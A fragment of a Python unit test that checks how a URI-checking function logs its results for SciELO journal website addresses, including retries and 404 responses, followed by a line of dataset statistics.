website_url_list = ["http://www.scielo.br", "https://newscielo.br"]
check_website_uri_list(uri_list_file_path, website_url_list)
bad_uri_1 = "http://www.scielo.br/scielo.php?script=sci_issues&pid=0001-3765"
bad_uri_2 = "https://newscielo.br/scielo.php?script=sci_serial&pid=0001-3765"
self.assertEqual(
mock_info.call_args_list,
[
call('Quantidade de URI: %i', 8),
call("Retry to access '%s' after %is", bad_uri_2, 5),
call("The URL '%s' returned the status code '%s' after %is",
bad_uri_2, 404, 5),
call("Não encontrados (%i/%i):\n%s", 2, 8,
"\n".join([
bad_uri_1,
bad_uri_2,
])),
]
)
| 38.442982 | 126 | 0.649287 | 1,079 | 8,765 | 4.861909 | 0.125116 | 0.081395 | 0.075486 | 0.109798 | 0.817003 | 0.813191 | 0.801182 | 0.774495 | 0.760579 | 0.760579 | 0 | 0.04892 | 0.244381 | 8,765 | 227 | 127 | 38.612335 | 0.743168 | 0 | 0 | 0.54359 | 0 | 0.005128 | 0.220878 | 0.152082 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.097436 | false | 0 | 0.020513 | 0 | 0.14359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.